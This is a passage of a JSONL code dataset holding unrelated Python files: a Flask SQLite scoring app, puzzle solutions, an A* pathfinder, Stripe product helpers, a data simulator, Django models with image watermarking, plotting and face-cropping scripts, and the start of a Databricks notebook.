str(row[20])+\",\"+\\\r\n str(row[21])+\",\"+\\\r\n str(row[22])+\",\"+\\\r\n str(row[23])+\",\"+\\\r\n str(row[24])+\",\"+\\\r\n str(row[25])+\",\"+\\\r\n str(row[26])+\",\"+\\\r\n str(row[27])+\")\"\r\n print(query)\r\n c.execute(query)\r\n conn.commit() \r\n\r\n #Get Top 5 Cities\r\n conn.execute(\"drop table Top5CityState\")\r\n conn.commit()\r\n\r\n conn.execute(\"create table Top5CityState as SELECT CityProfileScored.*, \\\r\n (SELECT COUNT()+1 FROM (SELECT DISTINCT Score FROM CityProfileScored AS t WHERE Score < CityProfileScored.Score) \\\r\n ) AS RtrmtRank, USNewsTop100.Img,USNewsTop100.Link,CrimeData.CrimeRate \\\r\n FROM CityProfileScored \\\r\n left join USNewsTop100 on trim(CityProfileScored.City)=trim(USNewsTop100.City) and trim(CityProfileScored.State)=trim(USNewsTop100.State) \\\r\n left join CrimeData on trim(CityProfileScored.City)=trim(CrimeData.City) and trim(CityProfileScored.State)=trim(CrimeData.State) \\\r\n\t\t Where RtrmtRank<=5 \\\r\n order by RtrmtRank\") \r\n \r\n conn.commit()\r\n\r\n return 1\r\n\r\n\r\n\r\n\r\n@app.route(\"/\")\r\ndef index(): \r\n \r\n return render_template(\"index.html\")\r\n\r\n@app.route(\"/score/\")\r\ndef score(ScoreParam):\r\n print(\"Start Scoring Engine\")\r\n print(ScoreParam)\r\n uList = ScoreParam.split(\",\")\r\n\r\n puPopulation=float(uList[0])\r\n puOver_65=float(uList[1])\r\n puRent=float(uList[2])\r\n puHome_Price=float(uList[3])\r\n puAssistance=float(uList[4])\r\n pwPopulation=float(uList[5])\r\n pwOver_65=float(uList[6])\r\n pwRent=float(uList[7])\r\n pwHome_Price=float(uList[8])\r\n pwAssistance=float(uList[9])\r\n \r\n scr=scoredata(puPopulation,puOver_65,puRent,puHome_Price,puAssistance,pwPopulation,pwOver_65,pwRent,pwHome_Price,pwAssistance)\r\n\r\n conn = sql.connect(\"./Datasets/RetirementDB.sqlite\")\r\n c = conn.cursor()\r\n c.execute(\"select * from Top5CityState\")\r\n\r\n component = c.fetchall()\r\n top5=[]\r\n for row in component:\r\n top5.append((row[0],row[1],row[2],row[3],row[4],row[5],row[6],row[7],row[8],row[9],row[10],row[11],row[12], \\\r\n row[13],row[14],row[15],row[16],row[17],row[18],row[19],row[20],row[21],row[22],row[23],row[24],row[25],row[26], \\\r\n row[27],row[28],row[29],row[30],row[31])) \r\n\r\n top5_df = pd.DataFrame(top5, columns=[\"City\",\"State\",\"Latitude\",\"Longitude\",\"URL\",\"uPopulation\", \\\r\n \"uOver_65\",\"uRent\",\"uHome_Price\",\"uAssistance\",\"zuPopulaton\", \\\r\n \"zuOver_65\",\"zuRent\",\"zuHome_Price\",\"zuAssistance\",\"cPopulation\", \\\r\n \"cOver_65\",\"cRent\",\"cHome_Price\",\"cAssistance\",\"zcPopulation\", \\\r\n \"zcOver_65\",\"zcRent\",\"zcHome_Price\",\"zcAssistance\", \\\r\n \"Score\",\"ZipCode\",\"USNewsRank\",\"RtrmtRank\",\"Img\",\"Link\",\"CrimeRate\"])\r\n top5_df.head() \r\n top5_df.to_json(orient='records')\r\n top5_dict=top5_df.to_json(orient='records') \r\n return json.dumps(top5_dict)\r\n\r\n\r\n@app.route(\"/usmap/\")\r\ndef usmap(): \r\n time.sleep(5) \r\n conn = sql.connect(\"./Datasets/RetirementDB.sqlite\")\r\n c = conn.cursor()\r\n\r\n\r\n # c.execute(\"select City,State,Latitude,Longitude,Score from CityProfileScored\")\r\n c.execute(\"SELECT CityProfileScored.City,CityProfileScored.State,CityProfileScored.Latitude,CityProfileScored.Longitude,CityProfileScored.Score, \\\r\n (SELECT COUNT()+1 FROM (SELECT DISTINCT Score FROM CityProfileScored AS t WHERE Score < CityProfileScored.Score) \\\r\n ) AS RtrmtRank \\\r\n FROM CityProfileScored \\\r\n order by RtrmtRank\")\r\n\r\n component = c.fetchall()\r\n allcities=[]\r\n for row in 
component:\r\n allcities.append((row[0],row[1],row[2],row[3],row[4],row[5])) \r\n\r\n allcities_df = pd.DataFrame(allcities, columns=[\"City\",\"State\",\"Latitude\",\"Longitude\",\"Score\",\"RtrmtRank\"])\r\n allcities_df.head() \r\n allcities_df.to_json(orient='records')\r\n allcities_dict=allcities_df.to_json(orient='records') \r\n return json.dumps(allcities_dict)\r\n\r\nif __name__ == \"__main__\":\r\n\r\n app.run(debug=True)","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":9913,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"375413222","text":"\n\nif __name__ == '__main__':\n T = int(input())\n for t in range(T):\n s = input()\n k = 0\n i = 0\n plus, minus = False, False\n\n if s[i] == '-': # treat the first -'s separately\n k += 1\n while i < len(s) and s[i] == '-':\n i += 1\n\n # then each '+-' pattern (repetitions don't count) augment k by 2\n while i < len(s) - 1:\n plus, minus = False, False\n # search for +'s\n while i < len(s) and s[i] == '+':\n plus = True\n i += 1\n # search for -'s, if there's none at the end of the string, the +'s count for nothing\n while i < len(s) and s[i] == '-':\n minus = True\n i += 1\n\n if plus and minus:\n k += 2\n\n\n print('Case #{}: {}'.format(t+1, k))\n","sub_path":"codes/CodeJamCrawler/16_0_2/Thooms./pbb.py","file_name":"pbb.py","file_ext":"py","file_size_in_byte":870,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"443198536","text":"\"\"\"\r\nAuthor: Sikder Tahsin Al Amin\r\nProblem:\r\nGiven two arrays, write a function to compute their intersection.\r\nInput: nums1 = [1,2,2,1], nums2 = [2,2]\r\nOutput: [2]\r\n\"\"\"\r\ndef intersection(num1,num2):\r\n intersect = []\r\n #intersect = num1\r\n\r\n for i in num1:\r\n if i in num2:\r\n intersect.append(i)\r\n intersect = list(set(intersect))\r\n return intersect\r\n","sub_path":"leetcode-my-solutions/349_intersection_of_two_arrays.py","file_name":"349_intersection_of_two_arrays.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"75047712","text":"\"\"\"\r\n ----------------------------------------------------------------------------\r\n \"THE BEER-WARE LICENSE\"\r\n As long as you retain this notice you can do whatever you want with this\r\n stuff. If you meet an employee from Windward some day, and you think this\r\n stuff is worth it, you can buy them a beer in return. Windward Studios\r\n ----------------------------------------------------------------------------\r\n \"\"\"\r\n\r\nfrom debug import trap, printrap\r\n\r\n# CACHEPATHS dictionary contains a number and a list of points associated with that number\r\nCACHEPATHS = {}\r\nOFFSETS = ( (-1, 0), (1, 0), (0, -1), (0, 1) )\r\nDEAD_END = 10000\r\nPOINT_OFF_MAP = (-1, -1)\r\n\r\ndef calculatePath(gmap, start, end):\r\n \"\"\"Calculate and return a path from start to end.\r\n\r\n This implementation is intentionally stupid and is NOT guaranteed in any\r\n way. 
Specifically, although it may, it is not guaranteed to:\r\n ->Return the shortest possible path\r\n ->Return a legal path\r\n ->Return in a reasonable amount of time\r\n ->Be free of bugs\r\n\r\n Use unmodified at your own risk.\r\n\r\n map -- The game map.\r\n start -- The tile units of the start point (inclusive).\r\n end -- The tile units of the end point (inclusive).\r\n\r\n \"\"\"\r\n # should never happen but just to be sure\r\n if start == end:\r\n return [start]\r\n\r\n #startEnd = {start.x: None, start.y: None, end.x: None, end.y: None}\r\n #savedPath = []\r\n #if CACHEPATHS.get(start) is not None: # TODO, this is wrong\r\n #return savedPath\r\n\r\n # nodes are points we have walked to\r\n nodes = {}\r\n # points we have in a trailPoint, but not yet evaluated\r\n notEvaluated = {}\r\n\r\n tpOn = TrailPoint(start, end, 0)\r\n while True:\r\n nodes[tpOn.mapTile] = tpOn\r\n\r\n # get the neighbors\r\n tpClosest = None\r\n for ptOffset in OFFSETS:\r\n pointNeighbor = (tpOn.mapTile[0] + ptOffset[0], tpOn.mapTile[1] + ptOffset[1])\r\n square = gmap.squareOrDefault(pointNeighbor)\r\n # off the map or not a road/bus stop\r\n if square is None or (not square.isDriveable()):\r\n continue\r\n # already evaluated - add it in\r\n if pointNeighbor in nodes:\r\n tpAlreadyEvaluated = nodes[pointNeighbor]\r\n \r\n tpRecalc = None\r\n ptIgnore = None\r\n\r\n if (tpAlreadyEvaluated.costFromStart + 1 < tpOn.costFromStart):\r\n tpRecalc = tpOn\r\n ptIgnore = tpAlreadyEvaluated.mapTile\r\n elif(tpOn.costFromStart + 1 < tpAlreadyEvaluated.costFromStart):\r\n tpRecalc = tpAlreadyEvaluated\r\n ptIgnore = tpOn.mapTile\r\n else:\r\n tpRecalc = None\r\n ptIgnore = POINT_OFF_MAP\r\n\r\n tpOn.costFromStart = min(tpOn.costFromStart, tpAlreadyEvaluated.costFromStart + 1)\r\n tpAlreadyEvaluated.costFromStart = min(tpAlreadyEvaluated.costFromStart, tpOn.costFromStart + 1)\r\n tpOn.neighbors.append(tpAlreadyEvaluated)\r\n if tpRecalc is not None:\r\n tpRecalc.recalculateFromStart(ptIgnore, (gmap.width * gmap.height) / 4)\r\n continue\r\n\r\n # add this one in\r\n tpNeighbor = TrailPoint(pointNeighbor, end, tpOn.costFromStart+1)\r\n tpOn.neighbors.append(tpNeighbor)\r\n # may already be in notEvaluated. If so remove it as this is a more\r\n # recent cost estimate.\r\n if tpNeighbor in notEvaluated:\r\n del notEvaluated[tpNeighbor.mapTile]\r\n\r\n # we only assign to tpClosest if it is closer to the destination.\r\n # If it's further away, then we use notEvaluated below to find the\r\n # one closest to the dest that we ahve not walked yet.\r\n if tpClosest is None:\r\n if tpNeighbor.costCompletePath() < tpOn.costCompletePath():\r\n # new neighbor is closer - work from this next\r\n tpClosest = tpNeighbor\r\n else:\r\n # this is further away - put in the list to try if a\r\n # better route is not found\r\n notEvaluated[tpNeighbor.mapTile] = tpNeighbor\r\n elif tpClosest.costCompletePath() <= tpNeighbor.costCompletePath():\r\n # this is further away - put in the list to try if a\r\n # better route is not found\r\n notEvaluated[tpNeighbor.mapTile] = tpNeighbor\r\n else:\r\n # this is closer than tpOn and another neighbor - use it next.\r\n notEvaluated[tpClosest.mapTile] = tpClosest\r\n tpClosest = tpNeighbor\r\n # re-calc based on neighbors\r\n tpOn.recalculateDistance(POINT_OFF_MAP, gmap.width + gmap.height)\r\n\r\n # if no closest, then get from notEvaluated. This is where it\r\n # guarantees that we are getting the shortest route - we go in here\r\n # if the above did not move a step closer. 
This may not either as\r\n # the best choice may be the neighbor we didn't go with above - but\r\n # we drop into this to find the closest based on what we know.\r\n if tpClosest is None:\r\n # we need the closest one as that's how we find the shortest path\r\n tpClosest = None\r\n for i in notEvaluated.keys():\r\n if(tpClosest is None):\r\n tpClosest = notEvaluated[i]\r\n elif(tpClosest.costCompletePath() > notEvaluated[i].costCompletePath()):\r\n tpClosest = notEvaluated[i]\r\n\r\n if tpClosest is None:\r\n break\r\n del notEvaluated[tpClosest.mapTile]\r\n\r\n # if we're at the end - we're done!\r\n if tpClosest.mapTile == end:\r\n tpClosest.neighbors.append(tpOn)\r\n nodes[tpClosest.mapTile] = tpClosest\r\n break\r\n\r\n # try this one next\r\n tpOn = tpClosest\r\n\r\n path = []\r\n if not (end in nodes):\r\n return\r\n\r\n # create the return path - from end back to beginning\r\n tpOn = nodes[end]\r\n path.append(tpOn.mapTile)\r\n while tpOn.mapTile != start:\r\n neighbors = tpOn.neighbors\r\n cost = tpOn.costFromStart\r\n\r\n tpOn = sorted(neighbors, key=lambda x: x.costFromStart)[0] # TODO make sure this is ok\r\n\r\n # we didn't get to the start.\r\n if tpOn.costFromStart >= cost:\r\n return path\r\n else:\r\n path.insert(0, tpOn.mapTile)\r\n\r\n # TODO add to cache\r\n return path\r\n\r\nclass TrailPoint(object):\r\n def __init__(self, point, end, costFromStart):\r\n \"\"\"A point in a car's path.\r\n\r\n mapTile -- The map tile (a 2-tuple) for this point in the trail.\r\n neighbors -- A list of the neighboring tiles (up to 4). If 0 then this\r\n point has been added as a neighbor but is in the notEvaluated list\r\n because it has not yet been tried.\r\n costToEnd -- Estimate of the distance from mapTile to the end. Manhattan\r\n distance if have no neighbors, best neighbor.distance + 1 otherwise.\r\n This value is bad if it's along a trail that failed.\r\n costFromStart -- The number of steps from the start to this tile\r\n costCompletePath -- The cost from beginning to end if using this tile in the final path\r\n\r\n \"\"\"\r\n self.mapTile = point\r\n self.neighbors = []\r\n self.costToEnd = abs(point[0] - end[0]) + abs(point[1] - end[1])\r\n self.costFromStart = costFromStart\r\n\r\n def costCompletePath(self):\r\n return self.costFromStart + self.costToEnd\r\n\r\n def recalculateFromStart(self, ptIgnore, remainingSteps):\r\n if self.costFromStart == 0:\r\n return\r\n if ((remainingSteps - 1) < 0):\r\n return\r\n for neighborOn in self.neighbors:\r\n # skip the neighbor that triggered this recalculation; compare by value since map tiles are tuples\r\n if neighborOn.mapTile == ptIgnore:\r\n continue\r\n if neighborOn.costFromStart <= self.costFromStart + 1:\r\n continue\r\n neighborOn.costFromStart = self.costFromStart + 1\r\n neighborOn.recalculateFromStart(self.mapTile, remainingSteps)\r\n\r\n def recalculateDistance(self, mapTileCaller, remainingSteps):\r\n neighbors = self.neighbors\r\n trap(self.costToEnd == 0)\r\n # if no neighbors then this is in notEvaluated and so can't recalculate.\r\n if len(neighbors) == 0:\r\n return\r\n\r\n shortestDistance = None\r\n # if just one neighbor, then it's a dead end\r\n if len(neighbors) == 1:\r\n shortestDistance = DEAD_END\r\n else:\r\n shortestDistance = min(neighbors, key=lambda n: n.costToEnd).costToEnd\r\n # it's 1+ lowest neighbor value (unless a dead end)\r\n if shortestDistance != DEAD_END:\r\n shortestDistance += 1\r\n\r\n # no change, no need to recalc neighbors\r\n if shortestDistance == self.costToEnd:\r\n return\r\n # new value (could be shorter or longer)\r\n self.costToEnd = shortestDistance\r\n # if gone too far, no 
more recalculate\r\n if remainingSteps < 0:\r\n return\r\n remainingSteps -= 1\r\n # need to tell our neighbors - except the one that called us\r\n newNeighbors = [n for n in neighbors if n.mapTile != mapTileCaller]\r\n for neighborOn in newNeighbors:\r\n neighborOn.recalculateDistance(self.mapTile, remainingSteps)\r\n # and we re-calc again because that could have changed our neighbors' values\r\n shortestDistance = min(neighbors, key=lambda n: n.costToEnd).costToEnd\r\n # it's 1+ lowest neighbor value (unless a dead end)\r\n if shortestDistance != DEAD_END:\r\n shortestDistance += 1\r\n self.costToEnd = shortestDistance\r\n\r\n def __repr__(self):\r\n return (\"TrailPoint\" %\r\n (self.mapTile, self.costFromStart, self.costToEnd, len(self.neighbors)))\r\n\r\n def __hash__(self):\r\n return hash(\"TrailPoint at {0}\".format(self.mapTile))\r\n\r\n def __eq__(self, other):\r\n if isinstance(other, TrailPoint) and other.mapTile == self.mapTile:\r\n return True\r\n else:\r\n return False","sub_path":"cw2014_python_client/simpleAStar.py","file_name":"simpleAStar.py","file_ext":"py","file_size_in_byte":10346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"36413668","text":"import stripe\nfrom django.utils.encoding import smart_str\n\nfrom .. import utils\nfrom .. import models\nfrom .. actions import skus\n\ndef sync_products():\n \"\"\"\n Synchronizes all the products from the Stripe API\n \"\"\"\n try:\n products = stripe.Product.auto_paging_iter()\n except AttributeError:\n products = iter(stripe.Product.list().data)\n\n for product in products:\n sync_product_from_stripe_data(product)\n\ndef sync_product_from_stripe_data(stripe_product):\n \"\"\"\n Create or update the product represented by the data from a Stripe API query.\n\n Args:\n stripe_product: the data representing a sku object in the Stripe API\n\n Returns:\n a pinax.stripe.models.Product object\n \"\"\"\n\n stripe_product_id = stripe_product[\"id\"]\n\n defaults = {\n 'active': stripe_product.get(\"active\"),\n 'attributes': stripe_product.get(\"attributes\"),\n 'caption': stripe_product.get(\"caption\"),\n 'description': stripe_product.get(\"description\"),\n 'images': stripe_product.get(\"images\"),\n 'livemode': stripe_product.get(\"livemode\"),\n 'metadata': stripe_product.get(\"metadata\"),\n 'name': stripe_product.get(\"name\"),\n 'package_dimensions': stripe_product.get(\"package_dimensions\"),\n 'shippable': stripe_product.get(\"shippable\")\n }\n\n obj, created = models.Product.objects.get_or_create(stripe_id=stripe_product_id)\n obj = utils.update_with_defaults(obj, defaults, created)\n skus.sync_skus_from_product(obj)\n return obj\n\ndef create(name, p_id=\"\", caption=\"\", description=\"\", active=True, shippable=False, attributes=None, images=None, metadata=None, package_dimensions=None):\n \"\"\"\n Creates a product\n\n Args:\n name: The product’s name, meant to be displayable to the customer.\n p_id: optionally, Unique identifier for the object, If an ID isn't provided, we'll generate one for you.\n caption: optionally, A short one-line description of the product, meant to be displayable to the customer.\n description: optionally, The product’s description, meant to be displayable to the customer.\n active: optionally, Whether or not the product is currently available for purchase. Defaults to True\n shippable: optionally, Whether this product is shipped (i.e. physical goods). 
Defaults to False.\n attributes: optionally, A list of up to 5 alphanumeric attributes that each SKU can provide values for (e.g. [\"color\", \"size\"]).\n images: optionally, A list of up to 8 URLs of images for this product, meant to be displayable to the customer.\n metadata: optionally, A set of key/value pairs that you can attach to a product object. It can be useful for storing additional information about the product in a structured format.\n package_dimensions: optionally, The dimensions of this product for shipping purposes, all values are required. e.g\n {\n \"height\": 20\n \"length\": 21\n \"weight\": 22\n \"width\": 23\n }\n\n Returns:\n the data representing the product object that was created\n \"\"\"\n\n product_params = {\n \"name\": name,\n \"active\": active,\n \"shippable\": shippable\n }\n\n if p_id:\n product_params.update({\"id\": p_id})\n\n if caption:\n product_params.update({\"caption\": caption})\n\n if description:\n product_params.update({\"description\": description})\n\n if attributes:\n product_params.update({\"attributes\": attributes})\n\n if images:\n product_params.update({\"images\": images})\n\n if metadata:\n product_params.update({\"metadata\": metadata})\n\n if package_dimensions:\n product_params.update({\"package_dimensions\": package_dimensions})\n\n stripe_product = stripe.Product.create(**product_params)\n return sync_product_from_stripe_data(stripe_product)\n\ndef update(product, name=\"\", caption=\"\", description=\"\", active=None, shippable=False, attributes=None, images=None, metadata=None, package_dimensions=None):\n \"\"\"\n Updates a product\n\n Args:\n product: the product to update\n name: optionally, a new name for the product\n caption: optionally, a new short one-line description\n description: optionally, a new description for the product\n active: optionally, whether the product is available for purchase\n shippable: optionally, whether this product is shipped\n attributes: optionally, a new list of SKU attributes\n images: optionally, a new list of image URLs\n metadata: optionally, a new set of key/value pairs for the product\n package_dimensions: optionally, new shipping dimensions for the product\n \"\"\"\n\n stripe_product = product.stripe_product\n\n if name:\n stripe_product.name = name\n if caption:\n stripe_product.caption = caption\n if description:\n stripe_product.description = description\n if active is not None:\n stripe_product.active = active\n if shippable:\n stripe_product.shippable = shippable\n if attributes:\n stripe_product.attributes = attributes\n if images:\n stripe_product.images = images\n if metadata:\n stripe_product.metadata = metadata\n if package_dimensions:\n stripe_product.package_dimensions = package_dimensions\n\n stripe_product.save()\n sync_product_from_stripe_data(stripe_product)\n\ndef retrieve(product_id):\n \"\"\"\n Retrieve a product object from Stripe's API\n\n Stripe throws an exception if the product has been deleted that we are\n attempting to sync. 
In this case we want to just silently ignore that\n exception but pass on any other.\n\n Args:\n product_id: the Stripe ID of the product you are fetching\n\n Returns:\n the data for a order object from the Stripe API\n \"\"\"\n if not product_id:\n return\n\n try:\n return stripe.Product.retrieve(product_id)\n except stripe.InvalidRequestError as e:\n if smart_str(e).find(\"No such product\") == -1:\n raise\n else:\n # Not Found\n return None\n\ndef delete(product):\n \"\"\"\n delete a product\n\n Args:\n product: the product to delete\n \"\"\"\n stripe_product = stripe.Product.retrieve(product.stripe_id)\n stripe_product.delete()\n product.delete()","sub_path":"pinax/stripe/actions/products.py","file_name":"products.py","file_ext":"py","file_size_in_byte":6356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"621338736","text":"from math import sin, pi\r\nfrom random import random\r\nimport time\r\nimport urllib\r\nimport urllib2\r\nimport argparse\r\nimport logging\r\n\r\nlogging.basicConfig()\r\nlogger = logging.getLogger('simulator')\r\nlogger.setLevel(logging.INFO)\r\n\r\n\r\ndef generate_values(without_outliers=False):\r\n sample_size = 1400\r\n amplitude = 1.0\r\n freq = 450.0\r\n amp = 1.0\r\n framerate = 44100\r\n sample = []\r\n\r\n clamp = lambda x, minval, maxval: max(minval, min(maxval, x))\r\n\r\n for i in range(sample_size):\r\n i = float(i)\r\n val = amp * sin(2.0 * pi * freq * (i / framerate))\r\n val += (amplitude * 2) + (random())\r\n sample.append(val)\r\n\r\n if not without_outliers:\r\n outlier_point = clamp(int(sample_size * random()), int(sample_size / 2), int(sample_size - sample_size / 10))\r\n bad_value_count = clamp(int(40 * random()), 10, 40)\r\n bad_multipler = clamp(3.0 * random(), 1.5, 2.0)\r\n for i in range(bad_value_count):\r\n sample[outlier_point + i] *= bad_multipler\r\n\r\n return sample\r\n\r\n\r\ndef generate_server_streams(server_count=1, without_outliers=False):\r\n assert server_count > 0\r\n all = []\r\n for i in range(server_count):\r\n server_id = i + 1\r\n values = generate_values(without_outliers)\r\n all.append([(server_id, v) for v in values])\r\n\r\n result = []\r\n for idx, payload in enumerate(all[0]):\r\n for dataset in all:\r\n result.append(dataset[idx])\r\n\r\n return result\r\n\r\n\r\ndef run_simulator(endpoint_url, server_count=2, without_outliers=False):\r\n values = generate_server_streams(server_count, without_outliers)\r\n for idx, payload in enumerate(values):\r\n (server_id, val) = payload\r\n logger.info(\"Sending datapoint %d..\" % (idx + 1))\r\n params = {\r\n 'server': server_id,\r\n 'value': val\r\n }\r\n params = urllib.urlencode(params)\r\n req = urllib2.Request(endpoint_url, params)\r\n response = urllib2.urlopen(req)\r\n output = response.read()\r\n logger.info(\"Server response: %s\" % (output))\r\n time.sleep(2)\r\n\r\n\r\nif __name__ == '__main__':\r\n parser = argparse.ArgumentParser(description='Generate coding test time values')\r\n parser.add_argument('endpoint', type=str,\r\n help='URL of your webservice endpoint')\r\n parser.add_argument('--servers', type=int, default=2,\r\n help='Number of servers to receive datapoints from')\r\n parser.add_argument('--no-outliers', action='store_true',\r\n help='Simulate timeseries without outliers')\r\n\r\n args = parser.parse_args()\r\n run_simulator(args.endpoint, args.servers, 
args.no_outliers)\r\n\r\n\r\n","sub_path":"server-monitor-django/simulator.py","file_name":"simulator.py","file_ext":"py","file_size_in_byte":2713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"269653564","text":"from django.db import models\nfrom django.contrib.auth.models import User\nfrom django.core.exceptions import ValidationError\nfrom PIL import Image, ImageDraw, ImageFont\n\n\n# Create your models here.\n\n# Algorithm for adding Watermark to Image\ndef watermark_image_with_text(filename):\n print(filename)\n if \".TIF\" in str(filename):\n print('error Occoured')\n raise ValidationError(\"Error \")\n else:\n print('Alright')\n text = 'Arthub watermark'\n color = 'blue'\n fontfamily = 'arial.ttf'\n image = Image.open(filename).convert('RGBA')\n imageWatermark = Image.new('RGBA', image.size, (255, 255, 255, 0))\n draw = ImageDraw.Draw(imageWatermark)\n width, height = image.size\n font = ImageFont.truetype(fontfamily, int(height / 20))\n textWidth, textHeight = draw.textsize(text, font)\n x = width / 5\n y = height / 6\n draw.text((x, y), text, color, font)\n my_image = Image.alpha_composite(image, imageWatermark)\n my_image.convert('RGB').save('D:\\Github\\PicMesh\\media\\water_'+filename.name + '.png')\n return 'D:\\Github\\PicMesh\\media\\water_'+filename.name + '.png'\n\n# Model for Photo which contains details of Photos such as name, id, format,etc\nclass Photo(models.Model):\n format_of_tags = (\n ('PNG', 'PNG'),\n ('JPG', 'JPG'),\n ('JPEG', 'JPEG'),\n ('Exif', 'Exif'),\n ('TIF', 'TIF'),\n ('GIF', 'GIF'),\n ('WEBP', 'WEBP'),\n ('SVG', 'SVG'),\n )\n title = models.CharField(max_length=150)\n format = models.CharField(max_length=20, choices=format_of_tags, blank=False)\n tags = models.CharField(max_length=250)\n original_pic = models.ImageField()\n display_pic = models.ImageField(null=True, blank=True)\n description = models.CharField(max_length=1000)\n price = models.PositiveIntegerField()\n photographer = models.ForeignKey('Photographer', on_delete=models.CASCADE)\n category = models.ForeignKey('Categories', on_delete=models.CASCADE, default=0)\n class Meta:\n verbose_name= 'art'\n verbose_name_plural= 'arts'\n\n # Overwrites save method and set value of display_pic by default\n def save(self, *args, **kwargs):\n print(self.original_pic)\n if not self.pk:\n rotate_img_name = watermark_image_with_text(self.original_pic)\n else:\n rotate_img_name = self.display_pic\n self.display_pic = rotate_img_name\n super().save(*args, **kwargs)\n\n def __str__(self):\n return self.title # this Function adds name as Given Title\n\n\n# Model for Photo which contains details of Photographer\nclass Photographer(models.Model):\n photographer_name = models.CharField(max_length=150)\n profile_pic = models.ImageField(default='default-profile.png')\n city = models.CharField(max_length=50)\n email_id = models.EmailField()\n details = models.CharField(max_length=1000)\n class Meta:\n verbose_name= 'artist'\n verbose_name_plural= 'artists'\n\n def __str__(self):\n return self.photographer_name # this Function adds name as Given Name of Photographer\n\n\n# Model for Photo which contains details of Category\nclass Categories(models.Model):\n category_name = models.CharField(max_length=200)\n category_description = models.CharField(max_length=1000)\n\n def __str__(self):\n return self.category_name\n\n\n# Model for Photo which contains details of Collection of user\nclass Coll(models.Model):\n user = models.ForeignKey(User, 
on_delete=models.CASCADE, unique=False)\n photo = models.ForeignKey('Photo', on_delete=models.CASCADE, unique=False)\n\n def __str__(self):\n return self.photo.title\n\n\n# Model for Photo which contains details of Order table\nclass Order(models.Model):\n user = models.ForeignKey(User, on_delete=models.CASCADE, unique=False)\n photo = models.ForeignKey('Photo', on_delete=models.CASCADE, unique=False)\n order_date = models.DateField(auto_now=True)\n\n def __str__(self):\n return str(self.user)\n","sub_path":"home/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4045,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"466742845","text":"# Import the pyplot module and give it the alias plt\nimport matplotlib.pyplot as plt\nimport matplotlib as mpl\nzhfont = mpl.font_manager.FontProperties(fname='/etc/msyh.ttf')\n\n\n\n#input_values = [1,2,3,4,5]\n#squares = [1,4,9,16,25]\n#plt.plot(input_values, squares, linewidth=5)\n\n## Set the chart title and label the axes\n#plt.title('Square Numbers', fontsize=24)\n#plt.xlabel('Value', fontsize=15)\n#plt.ylabel('Square of Value', fontsize=15)\n\n## Set the size of the tick labels\n#plt.tick_params(axis='both', which='major', labelsize=15)\n#plt.scatter(2,1,)\n#plt.show()\n\n#plt.scatter(x_values, y_values, edgecolor='none',)\n\nx_values = list(range(1, 1001))\ny_values = [x**2 for x in x_values]\nplt.scatter(x_values, y_values, c=y_values, cmap=plt.cm.Reds, edgecolor='none', s=5)\n\n# Set the chart title and label the axes\nplt.title('中国', fontproperties=zhfont, fontsize=24)\nplt.xlabel('年代', fontproperties=zhfont, fontsize=15)\nplt.ylabel('人口', fontproperties=zhfont, fontsize=15)\n\n# Set the size of the tick labels\nplt.tick_params(axis='both', which='major', labelsize=10)\n\n#\nplt.axis([0, 1100, 0, 1100000])\nplt.savefig('/home/qyl/桌面/002.png', bbox_inches='tight')\n","sub_path":"Python_World/数据可视化/mpl_squares.py","file_name":"mpl_squares.py","file_ext":"py","file_size_in_byte":1177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"502731298","text":"import numpy as np\nimport cv2\n\nimg = cv2.imread('images/faces.png', -1)\n\nface_cascade = cv2.CascadeClassifier('/Users/lukasmaly/Development/opencv/data/haarcascades/haarcascade_frontalface_default.xml')\n\ngray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\nfaces = face_cascade.detectMultiScale(gray, 1.3, 5)\n\ni = 0\n\nfor (x, y, w, h) in faces:\n face = img[y:y + h, x:x + w]\n cv2.imshow('Face ' + str(i), face)\n cv2.imwrite('output/face' + str(i) + '.png', face)\n i += 1\n\ncv2.waitKey(0)\ncv2.destroyAllWindows()","sub_path":"FaceRecognition/faceextraction.py","file_name":"faceextraction.py","file_ext":"py","file_size_in_byte":513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"432374698","text":"# Databricks notebook source\n\nSTORAGE_ACCOUNT_NAME = dbutils.secrets.get(scope=\"eim-dbrx\", key=\"intg-cscentstorage-account-name\")\nSTORAGE_CONTAINER = 'rgisoutboundfiles'\nSTORAGE_KEY = dbutils.secrets.get(scope=\"eim-dbrx\", key=\"intg-cscentstorage-storage-key\")\nSTORAGE_ACCOUNT_ENV = STORAGE_ACCOUNT_NAME + \".blob.core.windows.net\"\nSTORAGE_FOLDER = \"rgisoutboundfiles\"\n\n# COMMAND ----------\n\n## Connection string to connect to blob storage\nspark.conf.set(\n \"fs.azure.account.key.\"+STORAGE_ACCOUNT_NAME+\".blob.core.windows.net\",\n STORAGE_KEY)\n\n# COMMAND ----------\n\nfrom datetime import datetime\nimport pytz\nmnt = \"/mnt/entadls\"\nDLLocation = mnt+\"/curated/internal/product/rgis/\"\nDLLocationArchive = 
